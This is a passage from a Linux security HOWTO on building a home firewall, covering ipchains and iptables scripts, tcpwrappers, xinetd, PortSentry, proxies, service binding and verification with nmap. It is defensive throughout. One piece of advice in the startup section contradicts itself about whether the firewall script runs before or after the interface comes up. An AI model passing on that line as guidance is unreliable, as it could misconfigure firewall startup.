section, to be used later in the script. Then we set the default rules
(ipchains calls these "policies") of denying all inbound and forwarded
traffic, and of allowing all our own outbound traffic. We had to open some
holes in the high, unprivileged ports so that we could have return traffic
from connections that bigcat initiates to outside addresses. If we connect
to someone's web server, we want that HTML data to be able to get back to
us, for instance. The same applies to other network traffic. We then allowed
a few specific types of the ICMP protocol (most are still blocked).
We are also logging any inbound traffic that violates any of our rules, so we
know who is doing what. Notice that we are only using IP addresses here, not
hostnames of any kind. This is so that our firewall works even in situations
where there may be DNS failures, and also to prevent any kind of DNS spoofing.
See the ipchains man page for a full explanation of syntax. The important
ones we used here are:
  * -A input: Adds a rule to the "input" chain. The default chains are
    input, output, and forward.
  * -p udp: This rule only applies to the "UDP" "protocol". The -p option
    can be used with tcp, udp or icmp protocols.
  * -i $WAN_IFACE: This rule applies to the specified interface only, and
    applies to whatever chain is referenced (input, output, or forward).
  * -s <IP address> [port]: This rule only applies to the source address as
    specified. It can optionally have a port (e.g. 22) immediately afterward,
    or port range, e.g. 1023:4999.
  * -d <IP address> [port]: This rule only applies to the destination
    address as specified. Also, it may include port or port range.
  * -l : Any packet that hits a rule with this option is logged (lower case
    "L").
  * -j ACCEPT: Jumps to the "ACCEPT" "target". This effectively terminates
    this chain and decides the ultimate fate for this particular packet,
    which in this example is to "ACCEPT" it. The same is true for other -j
    targets like DENY.
By and large, the order in which command line options are specified is not
significant. The chain name (e.g. input) must come first though.
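To illustrate the kind of selective access described in the Strategy section,
a hypothetical rule allowing sshd connections only from a workplace address
range might look like the following (192.0.2.0/24 is a placeholder range;
substitute your own). It would be placed before the final logging DENY rule:

```shell
# Hypothetical: accept ssh (TCP port 22) only from our workplace
# range 192.0.2.0/24. Insert before the final catchall DENY rule.
$IPCHAINS -A input -p tcp -s 192.0.2.0/24 -d $WAN_IP 22 -j ACCEPT
```

Everyone outside that range still falls through to the default DENY, so sshd
is effectively invisible to the rest of the Internet.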
Remember in Step 1 when we ran netstat, we had both X and print servers
running among other things. We don't want these exposed to the Internet, even
in a limited way. These are still happily running on bigcat, but are now safe
and sound behind our ipchains based firewall. You probably have other
services that fall in this category as well.
The above example is a simplistic all or none approach. We allow all our own
outbound traffic (not necessarily a good idea), and block all inbound
connection attempts from outside. It is only protecting one interface, and
really just the inbound side of that interface. It would more than likely
require a bit of fine tuning to make it work for you. For a more advanced set
of rules, see the Appendix. And you might want to read [http://tldp.org/HOWTO
/IPCHAINS-HOWTO.html] http://tldp.org/HOWTO/IPCHAINS-HOWTO.html.
Whenever you have made changes to your firewall, you should verify its
integrity. One step to make sure your rules seem to be doing what you
intended, is to see how ipchains has interpreted your script. You can do this
by opening your xterm very wide, and issuing the following command:
+---------------------------------------------------------------------------+
| # ipchains -L -n -v | less |
| |
| |
+---------------------------------------------------------------------------+
The output is grouped according to chain. You should also find a way to scan
yourself (see the Verifying section below). And then keep an eye on your logs
to make sure you are blocking what is intended.
-----------------------------------------------------------------------------
5.2.2. iptables
iptables is the next generation packet filter for Linux, and requires a 2.4
kernel. It can do everything ipchains can, but has a number of noteworthy
enhancements. The syntax is similar to ipchains in many respects. See the man
page for details.
The most noteworthy enhancement is "connection tracking", also known as
"stateful inspection". This gives iptables more knowledge of the state of
each packet. Not only does it know if the packet is a TCP or UDP packet, or
whether it has the SYN or ACK flags set, but also if it is part of an
existing connection, or related somehow to an existing connection. The
implications for firewalling should be obvious.
The bottom line is that it is easier to get a tight firewall with iptables,
than with ipchains. So this is the recommended way to go.
Here is the same script as above, revised for iptables:
#!/bin/sh
#
# iptables.sh
#
# An example of a simple iptables configuration.
#
# This script allows ALL outbound traffic, and denies
# ALL inbound connection attempts from the Internet interface only.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
IPTABLES=/sbin/iptables
# Local Interfaces
# This is the WAN interface that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
## end user configuration options #################################
###################################################################
# Any and all addresses from anywhere.
ANYWHERE="0/0"
# This module may need to be loaded:
modprobe ip_conntrack_ftp
# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPTABLES -F
# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that IPTABLES uses.
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P INPUT DROP
# Accept localhost/loopback traffic.
$IPTABLES -A INPUT -i lo -j ACCEPT
## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPTABLES -A INPUT -p icmp --icmp-type echo-reply \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type destination-unreachable \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type time-exceeded \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
###################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-j
# LOG'. Outgoing traffic is allowed as the default policy for the
# 'output' chain. There are no restrictions on that.
$IPTABLES -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A INPUT -m state --state NEW -i ! $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT -j LOG -m limit --limit 30/minute --log-prefix "Dropping: "
echo "Iptables firewall is up `date`."
##-- eof iptables.sh
The same script logic is used here, and thus this does pretty much the same
thing as the ipchains script in the previous section. There are some
subtle differences in syntax. Note the case difference in the chain names,
for one (e.g. INPUT vs input). Logging is handled differently too. It has its
own "target" now (-j LOG), and is much more flexible.
There are some very fundamental differences as well, that might not be so
obvious. Remember this section from the ipchains script:
# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are the high,
# unprivileged ports (1024 to 4999 by default). This will allow return
# connection traffic for connections that we initiate to outside sources.
# TCP connections are opened with 'SYN' packets. We have already opened
# those services that need to accept SYNs for, so other SYNs are excluded here
# for everything else.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT
# We can't be so selective with UDP since that protocol does not know
# about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT
We jumped through hoops here with ipchains so that we could restrict
unwanted, incoming connections as much as possible. A bit of a kludge,
actually.
That section is missing from the iptables version. It is not needed as
connection tracking handles this quite nicely, and then some. This is due to
the "statefulness" of iptables. It knows more about each packet than ipchains
. For instance, it knows whether the packet is part of a "new" connection, or
an "established" connection, or a "related" connection. This is the so-called
"stateful inspection" of connection tracking.
There are many, many features of iptables that are not touched on here. For
more reading on the Netfilter project and iptables, see [http://
netfilter.samba.org] http://netfilter.samba.org. And for a more advanced set
of rules, see the Appendix.
-----------------------------------------------------------------------------
5.3. Tcpwrappers (libwrap)
Tcpwrappers provides much the same desired results as ipchains and iptables
above, though it works quite differently. Tcpwrappers actually intercepts the
connection attempt, then examines its configuration files, and decides
whether to accept or reject the request. Tcpwrappers controls access at the
application level, rather than the socket level like iptables and ipchains.
This can be quite effective, and it is a standard component on most Linux
systems.
Tcpwrappers consists of the configuration files /etc/hosts.allow and /etc/
hosts.deny. The functionality is provided by the libwrap library.
Tcpwrappers first looks to see if access is permitted in /etc/hosts.allow,
and if so, access is granted. If there is no match in /etc/hosts.allow, the
file /etc/hosts.deny is then checked; if a match is found there, access is
denied. Otherwise, access is granted. For this reason, /etc/hosts.deny should
contain only one uncommented line, and that is: ALL: ALL. Access should then
be permitted through entries in /etc/hosts.allow, where specific services are
listed, along with the specific host addresses allowed to access these
services. While hostnames can be used here, their use opens a limited
possibility for name spoofing.
Tcpwrappers is commonly used to protect services that are started via inetd
(or xinetd). But any program that has been compiled with libwrap support can
also take advantage of it. Just don't assume that all programs have built-in
libwrap support -- they do not. In fact, most probably don't. So we will only
use it in our examples here to protect services started via inetd, and then
rely on our packet filtering firewall, or other mechanism, to protect
non-(x)inetd services.
Below is a small snippet from a typical inetd.conf file:
+---------------------------------------------------------------------------+
| # Pop and imap mail services et al |
| # |
| #pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d |
| #pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d |
| #imap stream tcp nowait root /usr/sbin/tcpd imapd |
| # |
| |
| |
+---------------------------------------------------------------------------+
The second to last column is the tcpwrappers daemon -- /usr/sbin/tcpd.
Immediately after is the daemon it is protecting. In this case, POP and IMAP
mail servers. Your distro probably has already done this part for you. For
the few applications that have built-in support for tcpwrappers via the
libwrap library, specifying the daemon as above is not necessary.
We will use the same principles here: default policy is to deny everything,
then open holes to allow the minimal amount of traffic necessary.
So now with your text editor, su to root and open /etc/hosts.deny. If it does
not exist, then create it. It is just a plain text file. We want the
following line:
+---------------------------------------------------------------------------+
| ALL: ALL |
| |
| |
+---------------------------------------------------------------------------+
If it is there already, fine. If not, add it in, then save and close the
file. Easy enough. "ALL" is one of the keywords that tcpwrappers understands.
The format is $SERVICE_NAME : $WHO, so we are denying all connections to all
services here. At least, all services that are using tcpwrappers. Remember,
this will primarily be inetd services. See man 5 hosts_access for details on
the syntax of these files. Note the "5" there!
Now let's open up just the services we need, as restrictively as we can, with
a brief example:
+---------------------------------------------------------------------------+
| ALL: 127.0.0.1 |
| sshd,ipop3d: 192.168.1. |
| sshd: .myworkplace.com, hostess.mymomshouse.com |
| |
| |
+---------------------------------------------------------------------------+
The first line allows all "localhost" connections. You will need this. The
second allows connections to the sshd and ipop3d services from IP addresses
that start with 192.168.1., in this case the private address range for our
hypothetical home LAN. Note the trailing ".". It's important. The third line
allows connections to only our sshd daemon from any host associated with
.myworkplace.com. Note the leading "." in this example. And then also, the
single host hostess.mymomshouse.com. In summary, localhost and all our LAN
connections have access to any and all tcpwrappered services on bigcat. But
only our workplace addresses, and our mother can use sshd on bigcat from
outside connections. Everybody else is denied by the default policy in /etc/
hosts.deny.
The types of wild cards above (.myworkplace.com and 192.168.1.) are not
supported by ipchains and iptables, or most other Linux applications for that
matter. Also, tcpwrappers can use hostnames in place of IP addresses, which
is quite handy in some situations. This does not work with ipchains and
iptables.
You can test your tcpwrappers configuration with the included tcpdchk utility
(see the man page). Note that, at this time, tcpdchk does not work with
xinetd, and may not even be included on systems using xinetd.
There is nothing wrong with using both tcpwrappers and a packet filtering
firewall like ipchains. In fact, it is recommended to use a "layered"
approach. This helps guard against accidental misconfigurations. In this
case, each connection will be tested by the packet filter rules first, then
tcpwrappers.
Remember to make backup copies before editing system configuration files,
restart the daemon afterward, and then check the logs for error messages.
-----------------------------------------------------------------------------
5.3.1. xinetd
As mentioned, [http://www.xinetd.org] xinetd is an enhanced inetd. It has
much of the same functionality, with some notable enhancements. One is that
tcpwrappers support can be compiled in, eliminating the need for explicit
references to tcpd. This means /etc/hosts.allow and /etc/hosts.deny are
automatically in effect. Don't assume this is the case though. A little
testing, then viewing the logs, should tell you whether tcpwrappers support
is automatic or not.
Some of xinetd's other enhancements: specify IP address to listen on, which
is a very effective method of access control; limit the rate of incoming
connections and the total number of simultaneous connections; limit services
to specific times of day. See the xinetd and xinetd.conf man pages for more
details.
The syntax is quite different though. An example from /etc/xinetd.d/tftp:
+---------------------------------------------------------------------------+
| service tftp |
| { |
| socket_type = dgram |
| bind = 192.168.1.1 |
| instances = 2 |
| protocol = udp |
| wait = yes |
| user = nobody |
| only_from = 192.168.1.0 |
| server = /usr/sbin/in.tftpd |
| server_args = /tftpboot |
| disable = no |
| } |
| |
| |
+---------------------------------------------------------------------------+
Notice the bind statement. We are only listening on, or "binding" to, the
private, LAN interface here. No outside connections can be made since the
outside port is not even opened. We are also only accepting connections from
192.168.1.0, our LAN. For xinetd's purposes, this denotes any IP address
beginning with "192.168.1". Note that the syntax is different from inetd. The
server statement in this case is the tftp daemon, in.tftpd. Again, this
assumes that libwrap/tcpwrappers support is compiled into xinetd. The user
running the daemon will be "nobody". Yes, there is a user account called
"nobody", and it is wise to run such daemons as non-root users whenever
possible. Lastly, the disable statement is xinetd's way of turning services
on or off. In this case, it is "on", but only as an example. Do NOT run tftp
as a public service, as it is unsafe.
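The rate and time limits mentioned above can be sketched in a hypothetical
service entry. Everything here -- the service choice, paths, and values --
is illustrative only (most people run sshd standalone rather than from
xinetd):

```
# /etc/xinetd.d/ssh (hypothetical) -- illustrates xinetd's built-in
# access controls alongside tcpwrappers.
service ssh
{
        socket_type     = stream
        protocol        = tcp
        wait            = no
        user            = root
        server          = /usr/sbin/sshd
        server_args     = -i
        only_from       = 192.168.1.0
        instances       = 4
        per_source      = 2
        access_times    = 08:00-17:00
        disable         = no
}
```

Here instances caps the total number of simultaneous connections, per_source
caps connections from any one address, and access_times restricts the
service to business hours.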
-----------------------------------------------------------------------------
5.4. PortSentry
[http://www.psionic.org/products/portsentry.html] Portsentry works quite
differently from the other tools discussed so far. Portsentry does what its
name implies -- it guards ports. Portsentry is configured with the /etc/
portsentry/portsentry.conf file.
Unlike the other applications discussed above, it does this by actually
becoming the listening server on those ports. Kind of like baiting a trap.
Running netstat -taup as root while portsentry is running, will show
portsentry as the LISTENER on whatever ports portsentry is configured for. If
portsentry senses a connection attempt, it blocks it completely. And then
goes a step further and blocks the route to that host to stop all further
traffic. Alternately, ipchains or iptables can be used to block the host
completely. So it makes an excellent tool to stop port scanning of a range of
ports.
But portsentry has limited flexibility as to whether it allows a given
connection. It is pretty much all or nothing. You can define specific IP
addresses that it will ignore in /etc/portsentry/portsentry.ignore. But you
cannot allow selective access to individual ports. This is because only one
server can bind to a particular port at the same time, and in this case that
is portsentry itself. So it has limited usefulness as a stand-alone firewall.
As part of an overall firewall strategy, yes, it can be quite useful. For
most of us, it should not be our first line of defense, and we should only
use it in conjunction with other tools.
Suggestions on when portsentry might be useful:
  * As a second layer of defense, behind either ipchains or iptables. Packet
    filtering will catch the packets first, so that anything that gets to
    portsentry would indicate a misconfiguration. Do not use it in
    conjunction with inetd services -- it won't work. They will butt heads.
  * As a way to catch full range port scans. Open a pinhole or two in the
    packet filter, and let portsentry catch these and react accordingly.
  * If you are very sure you have no exposed public servers at all, and you
    just want to know who is up to what. But do not assume anything about
    what portsentry is protecting. By default it does not watch all ports,
    and may even leave some very commonly probed ports open. So make sure you
    configure it accordingly. And make sure you have tested and verified your
    set up first, and that nothing is exposed.
All in all, the packet filters make for a better firewall.
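For reference, the heart of a portsentry setup is a handful of options in
/etc/portsentry/portsentry.conf. A minimal sketch follows; the port lists
are shortened for illustration, so check the file shipped with your
distribution for the full defaults:

```
# Ports portsentry will bind to and watch ("bait"). Keep these away
# from ports where real servers are listening.
TCP_PORTS="1,11,15,111,540,1080,12345,31337"
UDP_PORTS="1,7,9,69,161,513,640,31337"
# "1" enables the blocking responses below.
BLOCK_TCP="1"
BLOCK_UDP="1"
# Drop the route to the offending host ($TARGET$ is expanded by
# portsentry). An ipchains or iptables command could be used instead.
KILL_ROUTE="/sbin/route add -host $TARGET$ reject"
# Also deny the host via tcpwrappers.
KILL_HOSTS_DENY="ALL: $TARGET$"
```

Test carefully before relying on this: an attacker who spoofs a trusted
address can trick automatic blocking into a denial of service against you,
which is one more reason portsentry belongs behind a packet filter.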
-----------------------------------------------------------------------------
5.5. Proxies
The dictionary defines "proxy" as "the authority or power to act on behalf of
another". This pretty well describes software proxies as well. It is an
intermediary in the connection path. As an example, if we were using a web
proxy like "squid" ([http://www.squid-cache.org/] http://www.squid-cache.org
/), every time we browse to a web site, we would actually be connecting to
our locally running squid server. Squid in turn, would relay our request to
the ultimate, real destination. And then squid would relay the web pages back
to us. It is a go-between. Like "firewalls", a "proxy" can refer to either a
specific application, or a dedicated server which runs a proxy application.
Proxies can perform various duties, not all of which have much to do with
security. But the fact that they are an intermediary, makes them a good place
to enforce access control policies, limit direct connections through a
firewall, and control how the network behind the proxy looks to the Internet.
So this makes them strong candidates to be part of an overall firewall
strategy. In fact, they are sometimes used instead of packet filtering
firewalls. Proxy based firewalls probably make more sense where many users
are behind the same firewall. A proxy is probably not high on the list of
components necessary for home based systems.
Configuring and administering proxies can be complex, and is beyond the scope
of this document. The Firewall and Proxy Server HOWTO, [http://tldp.org/HOWTO
/Firewall-HOWTO.html ] http://tldp.org/HOWTO/Firewall-HOWTO.html, has
examples of setting up proxy firewalls. Squid usage is discussed at [http://
squid-docs.sourceforge.net/latest/html/book1.htm] http://
squid-docs.sourceforge.net/latest/html/book1.htm
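As a small illustration of proxy-based access control, a squid configuration
might contain something like the following. This is only a sketch: the
address range is an example, and real-world policies need much more care
(see the squid documentation above):

```
# /etc/squid/squid.conf (fragment)
# Define the local network, allow it to use the proxy, deny everyone else.
acl localnet src 192.168.1.0/24
http_access allow localnet
http_access deny all
# Listen on the standard proxy port.
http_port 3128
```

The "deny all" at the end is the important part: anything not explicitly
allowed earlier is refused, which is the same default-deny posture a packet
filter should have.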
-----------------------------------------------------------------------------
5.6. Individual Applications
Some servers may have their own access control features. You should check
this for each server application you run. We'll only look at a few of the
common ones in this section. Man pages, and other application specific
documentation, are your friends here. This should be done whether you have
confidence in your firewall or not. Again, layers of protection are always
best.
  * BIND - a very common package that provides name server functionality. The
daemon itself is "named". This only requires full exposure to the
Internet if you are providing DNS look ups for one or more domains to the
rest of the world. If you are not sure what this means, you do not need,
or want, it exposed. For the overwhelming majority of us this is the
case. It is a very common crack target.
But it may be installed, and can be useful in a caching only mode. This
does not require full exposure to the Internet. Limit the interfaces on
which it "listens" by editing /etc/named.conf (random example shown):
+---------------------------------------------------------------+
| |
| options { |
| directory "/var/named"; |
| listen-on { 127.0.0.1; 192.168.1.1; }; |
| version "N/A"; |
| }; |
| |
| |
+---------------------------------------------------------------+
The "listen-on" statement is what limits where named listens for DNS
queries. In this example, only on localhost and bigcat's LAN interface.
There is no port open for the rest of the world. It just is not there.
Restart named after making changes.
  * X11 can be told not to allow TCP connections by using the -nolisten tcp
command line option. If using startx, you can make this automatic by
placing alias startx="startx -- -nolisten tcp" in your ~/.bashrc, or the
system-wide file, /etc/bashrc, with your text editor. If using xdm (or
variants such as gdm, kdm, etc), this option would be specified in /etc/
X11/xdm/Xservers (or comparable) as :0 local /usr/bin/X11/X -nolisten
tcp. gdm actually uses /etc/X11/gdm/gdm.conf.
If using xdm (or comparable) to start X automatically at boot, /etc/
inittab can be modified as: xdm -udpPort 0, to further restrict
connections. This is typically near the bottom of /etc/inittab.
  * Recent versions of sendmail can be told to listen only on specified
addresses:
+---------------------------------------------------------------+
| # SMTP daemon options |
| O DaemonPortOptions=Port=smtp,Addr=127.0.0.1, Name=MTA |
| |
| |
+---------------------------------------------------------------+
The above excerpt is from /etc/sendmail.cf, which can be carefully edited
with your text editor. The corresponding sendmail.mc directive is:
+---------------------------------------------------------------------------+
| |
| dnl This changes sendmail to only listen on the loopback device 127.0.0.1 |
| dnl and not on any other network devices. |
| DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA') |
| |
| |
+---------------------------------------------------------------------------+
Use this directive if you would prefer to build a new sendmail.cf, rather than edit the
existing one. Other mail server daemons likely have similar configuration
options. Check your local documentation.
  * SAMBA connections can be restricted in smb.conf:
+---------------------------------------------------------------+
 | bind interfaces only = yes |
| interfaces = 192.168.1. 127. |
| hosts allow = 192.168.1. 127. |
| |
| |
+---------------------------------------------------------------+
This will only open, and allow, connections from localhost (127.0.0.1),
and the local LAN address range. Adjust the LAN address as needed.
  * The CUPS print daemon can be told where to listen for connections. Add to
/etc/cups/cupsd.conf:
+---------------------------------------------------------------+
| Listen 192.168.1.1:631 |
| |
| |
+---------------------------------------------------------------+
This will only open a port at the specified address and port number.
  * xinetd can force daemons to listen only on a specified address with its
"bind" configuration directive. For instance, an internal LAN interface
address. See man xinetd.conf for this and other syntax. There are various
other control mechanisms as well.
As always, anytime you make system changes, backup the configuration file
first, restart the appropriate daemon afterward, and then check the
appropriate logs for error messages.
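One way to double-check which addresses your daemons have actually bound to,
without trusting any individual service's configuration, is to read /proc/
net/tcp directly. The sketch below decodes the listening sockets; addresses
there are little-endian hex, so 0100007F:0277 means 127.0.0.1:631 (IPv6
sockets live in /proc/net/tcp6 and are not shown):

```shell
#!/bin/sh
# List TCP sockets in LISTEN state (state 0A) straight from /proc/net/tcp.
awk 'NR > 1 && $4 == "0A" { split($2, a, ":"); print a[1], a[2] }' /proc/net/tcp |
while read hexip hexport; do
    # /proc stores the IP little-endian: reverse the four bytes, then let
    # printf(1) convert each hex byte, and the hex port, to decimal.
    ip=$(printf '%d.%d.%d.%d' \
        "0x$(echo "$hexip" | cut -c7-8)" "0x$(echo "$hexip" | cut -c5-6)" \
        "0x$(echo "$hexip" | cut -c3-4)" "0x$(echo "$hexip" | cut -c1-2)")
    printf '%s:%d\n' "$ip" "0x$hexport"
done
```

Anything listed as 0.0.0.0:port is listening on all interfaces, and is worth
a second look against the per-application settings above.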
-----------------------------------------------------------------------------
5.7. Verifying
The final step after getting your firewall in place, is to verify that it is
doing what you intended. You would be wise to do this anytime you make even
minor changes to your system configuration.
So how to do this? There are several things you can do.
For our packet filters like ipchains and iptables, we can list all our rules,
chains, and associated activity with iptables -nvL | less (substitute
ipchains if appropriate). Open your xterm as wide as possible to avoid
wrapping long lines.
This should give you an idea if your chains are doing what you think they
should. You may want to perform some of the on-line tasks you normally do
first: open a few web pages, send and retrieve mail, etc. This will, of
course, not give you any information on tcpwrappers or portsentry. tcpdchk
can be used to verify tcpwrappers configuration (except with xinetd).
And then, scan yourself. nmap is the scanning tool of choice and may be
available via your distribution, or from [http://www.insecure.org/nmap/
nmap_download.html] http://www.insecure.org/nmap/nmap_download.html. nmap is
very flexible, and essentially is a "port prober". In other words, it looks
for open ports, among other things. See the nmap man page for details.
If you do run nmap against yourself (e.g. nmap localhost), this should tell
you what ports are open -- and visible locally only! Which hopefully by now,
is quite different from what can be seen from the outside. So, scan yourself,
and then find a trusted friend, or site (see the Links section), to scan you
from the outside. Make sure you are not violating your ISP's Terms of Service
by port scanning. It may not be allowed, even if the intentions are
honorable. Scanning from outside is the best way to know how the rest of the
world sees you. This should tell you how well that firewall is working. See
the nmap section in the Appendix for some examples on nmap usage.
One caveat on this: some ISPs may filter some ports, and you will not know
for sure how well your firewall is working. Conversely, they may make it look
like certain ports are open by using web, or other, proxies. The scanner may
see the web proxy at port 80 and mis-report it as an open port on your
system.
Another option is to find a website that offers full range testing. [http://
www.hackerwhacker.com] http://www.hackerwhacker.com is one such site. Make
sure that any such site is not just scanning a relatively few well known
ports.
Repeat this procedure with every firewall change, every system upgrade or new
install, and when any key components of your system changes.
You may also want to enable logging all the denied traffic. At least
temporarily. Once the firewall is verified to be doing what you think it
should, and if the logs are hopelessly overwhelming, you may want to disable
logging.
If relying on portsentry at all, please read the documentation. Depending on
your configuration it will either drop the route to the scanner, or implement
an ipchains/iptables rule doing the same thing. Also, since it "listens" on
the specified ports, all those ports will show as "open". A false alarm in
this case.
-----------------------------------------------------------------------------
5.8. Logging
Linux does a lot of logging. Usually to more than one file. It is not always
obvious what to make of all these entries -- good, bad or indifferent?
Firewall logs tend to generate a fair amount of each. Of course, you are
wanting to stop only the "bad", but you will undoubtedly catch some harmless
traffic as well. The 'net has a lot of background noise.
In many cases, knowing the intention of an incoming packet is almost
impossible. Attempted intrusion? Misbehaved protocol? Mis-typed IP address?
Conclusions can be drawn based on factors such as destination port, source
port, protocol, and many other variables. But there is no substitute for
experience in interpreting firewall logs. It is a black art in many cases.
So do we really need to log? And how much should we be trying to log? Logging
is good in that it tells us that the firewall is functional. Even if we don't
understand much of it, we know it is doing "something". And if we have to, we
can dig into those logs and find whatever data might be called for.
On the other hand, logging can be bad if it is so excessive, it is difficult
to find pertinent data, or worse, fills up a partition. Or if we overreact
and take every last entry as an all out assault. Some perspective is a great
benefit, but something that new users lack almost by definition. Again, once
your firewall is verified, and you are perplexed or overwhelmed, home desktop
users may want to disable as much logging as possible. Anyone with greater
responsibilities should log, and then find ways to extract the pertinent data
from the logs by filtering out extraneous information.
Not sure where to look for log data? This could conceivably be many places
depending on how your distribution configured the various daemons and
syslogd. Most logging is done in /var/log/*. Check that directory with ls -l /var/
log/ and see if you can tell the most active logs by size and timestamp.
Also, look at /etc/syslog.conf to see where the default logs are. /var/log/
messages is a good place to look for starters.
Portsentry and tcpwrappers do a certain amount of logging that is not
adjustable. xinetd has logging enhancements that can be turned on. Both
ipchains and iptables, on the other hand, are very flexible as to what is
logged.
For ipchains the -l option can be added to any rule. iptables uses the -j LOG
target, and requires its own, separate rule instead. iptables goes a few
steps further and allows customized log entries, and rate limiting. See the
man page. Presumably, we are more interested in logging blocked traffic, so
we'd confine logging to only our DENY and REJECT rules.
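As an illustration, a logging rule pair for iptables might look like the
following. This is only a sketch: the interface name and limit values are
arbitrary examples, and the commands require root:

```
# Log new, unsolicited inbound connection attempts, then drop them.
# The limit match keeps a sustained scan from flooding the logs.
iptables -A INPUT -i eth0 -m state --state NEW \
    -m limit --limit 5/minute -j LOG --log-prefix "INPUT DROP: "
iptables -A INPUT -i eth0 -m state --state NEW -j DROP
```

Note the two separate rules: the LOG target does not terminate matching, so
the packet falls through to the DROP rule after being logged.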
So whether you log, and how much you log, and what you do with the logs, is
an individual decision, and probably will require some trial and error so
that it is manageable. A few auditing and analytical tools can be quite
helpful:
Some tools will monitor your logs for you and notify you when necessary.
These likely will require some configuration, and trial and error, to make
the most out of them:
  * A nice log entry analyzer for ipchains and iptables from Manfred Bartz:
[http://www.logi.cc/linux/NetfilterLogAnalyzer.php3] http://www.logi.cc/
linux/NetfilterLogAnalyzer.php3. What does all that stuff mean anyway?
  * LogSentry (formerly logcheck) is available from [http://www.psionic.org/
products/logsentry.html] http://www.psionic.org/products/logsentry.html,
the same group that is responsible for portsentry. LogSentry is an all
purpose log monitoring tool with a flexible configuration, that handles
multiple logs.
  * [http://freshmeat.net/projects/firelogd/] http://freshmeat.net/projects/
firelogd/, the Firewall Log Daemon from Ian Jones, is designed to watch,
and send alerts on iptables or ipchains logs data.
  * [http://freshmeat.net/projects/fwlogwatch/] http://freshmeat.net/projects
/fwlogwatch/ by Boris Wesslowski, is a similar idea, but supports more
log formats.
-----------------------------------------------------------------------------
5.9. Where to Start
Let's take a quick look at where to run our firewall scripts from.
Portsentry can be run as an init process, like other system services. It is
not so important when this is done. Tcpwrappers will automatically be
invoked by inetd or xinetd, so there is no need to worry there either.
But the packet filtering scripts will have to be started somewhere. And many
scripts will have logic that uses the local IP address. This will mean that
the script must be started after the interface has come up and been assigned
an IP address. Ideally, this should be immediately after the interface is up.
So this depends on how you connect to the Internet. Also, for protocols like
PPP or DHCP that may be dynamic, and get different IP's on each re-connect,
it is best to have the scripts run by the appropriate daemon.
For PPP, you probably have an /etc/ppp/ip-up file. This will be executed
every time there is a connect or re-connect. You should put the full path to
your firewall script here. Check the local documentation for the correct
location. Debian uses files in /etc/ppp/ip-up.d/, so either put the script
itself there, or a symlink to it. Red Hat uses /etc/ppp/ip-up.local for any
user defined, local PPP configuration.
For DHCP, it depends on which client. dhcpcd will execute /etc/dhcpcd/dhcpcd-
<interface>.exe (e.g. dhcpcd-eth0.exe) whenever a lease is obtained or
renewed. So this is where to put a reference to your firewall script. For
pump, the main configuration file is /etc/pump.conf. Pump will run whatever
script is defined by the "script" statement any time there is a new or
renewed lease:
script /usr/local/bin/ipchains.sh
If you have a static IP address (i.e. it never changes), the placement is not
so critical, though ideally the script should still run before the interface comes up.
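For example, a minimal /etc/ppp/ip-up.local (the Red Hat location mentioned
above) might simply hand the interface and address off to the firewall
script. This is a sketch; the firewall script name and its arguments are
hypothetical, so adjust them to your own setup:

```
#!/bin/sh
# /etc/ppp/ip-up.local -- run by pppd after each connect or re-connect.
# pppd passes: interface tty speed local-IP remote-IP ipparam
IFACE="$1"
LOCAL_IP="$4"
# Hypothetical firewall script; substitute your own path and arguments.
/usr/local/bin/ipchains.sh "$IFACE" "$LOCAL_IP"
```

Because pppd passes the freshly assigned local IP as the fourth argument,
the firewall script always sees the current address, even on dynamic links.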
-----------------------------------------------------------------------------
5.10. Summary and Conclusions for Step 3
In this section we looked at various components that might be used to
construct a "firewall". And learned that a firewall is as much a strategy and
combination of components, as it is any one particular application or
component. We looked at a few of the most commonly available applications
that can be found on most, if not all, Linux systems. This is not a
definitive list.
This is too much information to digest all at one time and expect anyone
to understand it all. Hopefully this can be used as a starting point, and used
for future reference as well. The packet filter firewall examples can be used
as starting points as well. Just use your text editor, cut and paste into a
file with an appropriate name, and then run chmod +x against it to make it
executable. Some minor editing of the variables may be necessary. Also look
at the Links section for sites and utilities that can be used to generate a
custom script. This may be a little less daunting.
Now we are done with Steps 1, 2 and 3. Hopefully by now you have already
instituted some basic measures to protect your system(s) from the various and
sundry threats that lurk on networks. If you haven't implemented any of the
above steps yet, now is a good time to take a break, go back to the top, and
have at it. The most important steps are the ones above.
A few quick conclusions...
"What is best iptables, ipchains, tcpwrappers, or portsentry?" The quick
answer is that iptables can do more than any of the others. So if you are
using a 2.4 kernel, use iptables. Then, ipchains if using a 2.2 kernel. The
long answer is "it just depends on what you are doing and what the objective
is". Sorry. The other tools all have some merit in any given situation, and
all can be effective in the right situation.
"Do I really need all these packages?" No, but please combine more than one
approach, and please follow all the above recommendations. iptables by itself
is good, but in conjunction with some of the other approaches, we are even
stronger. Do not rely on any single mechanism to provide a security blanket.
"Layers" of protection is always best. As is sound administrative practices.
The best iptables script in the world is but one piece of the puzzle, and
should not be used to hide other system weaknesses.
"If I have a small home LAN, do I need to have a firewall on each computer?"
No, not necessary as long as the LAN gateway has a properly configured
firewall. Unwanted traffic should be stopped at that point. And as long as
this is working as intended, there should be no unwanted traffic on the LAN.
